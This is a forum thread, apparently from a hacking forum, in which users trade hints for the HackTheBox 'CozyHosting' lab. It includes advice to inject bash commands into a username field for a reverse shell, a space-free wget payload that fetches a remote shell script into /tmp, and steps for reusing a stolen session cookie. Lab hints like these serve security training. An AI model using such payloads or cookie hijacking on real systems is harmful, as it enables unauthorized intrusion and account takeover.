HTB - CozyHosting
by soulmate - Sunday September 3, 2023 at 01:12 AM
#11
(09-03-2023, 02:40 PM)PENGANLI001 Wrote: every valid hostname
I first though is app-shell can read the app-/etc/hosts/
127.0.0.1 localhost cozyhosting cozyhosting.htb
127.0.1.1 cozycloud

# The following lines are desirable for IPv6 capable hosts
::1    ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

but it seem like the my machine IP still work

OK I will read the https://portswigger url
thank you

Try injecting some bash command into the username field, find a way to avoid using spaces in commands and you can have your revshell
Reply
#12
user is so difficult
Reply
#13
still stuck on the admin page.... no redirect on localhost bcus error, wth??
Reply
#14
(09-03-2023, 03:08 PM)flagbot Wrote: still stuck on the admin page.... no redirect on localhost bcus error, wth??

that's weird, is it etc host file problem?
Reply
#15
Rooted, if someone need help, he can ask
Reply
#16
you can actually enter a command with arguments with no spaces
{wget,http://ip/shell.sh,-P,/tmp/}
Reply
#17
Found the user kanderson but Idk how to login with the cookie. Any help plz?
Reply
#18
(09-03-2023, 06:43 PM)hexa11 Wrote: Found the user kanderson but Idk how to login with the cookie. Any help plz?

open browser devtools go to storage find your cookie replace with new cookie then refresh
Reply
#19
(09-03-2023, 08:07 PM)9xEntEr Wrote:
(09-03-2023, 06:43 PM)hexa11 Wrote: Found the user kanderson but Idk how to login with the cookie. Any help plz?

open browser devtools go to storage find your cookie replace with new cookie then refresh

If using burp you can replace the JSESSIONID with it as well
Reply
#20
(09-03-2023, 08:55 PM)grisey Wrote: Any tips about getting to user josh\root?

looks to postgresql
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 360 88,710 03-28-2026, 09:28 AM
Last Post: catsweet
  [FREE] HTB-ProLabs APTLABS Just Flags kewlsunny 23 2,348 03-28-2026, 03:30 AM
Last Post: lulaladrow
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 87 7,490 03-27-2026, 07:22 PM
Last Post: stn
  HTB Eloquia User and Root Flags - Insane Box 69646B 13 350 03-27-2026, 06:14 PM
Last Post: vlxw
  HTB - ALL Challenges you Stuck in osamy7593 2 646 03-27-2026, 04:24 PM
Last Post: catsweet



 Users browsing this thread: 1 Guest(s)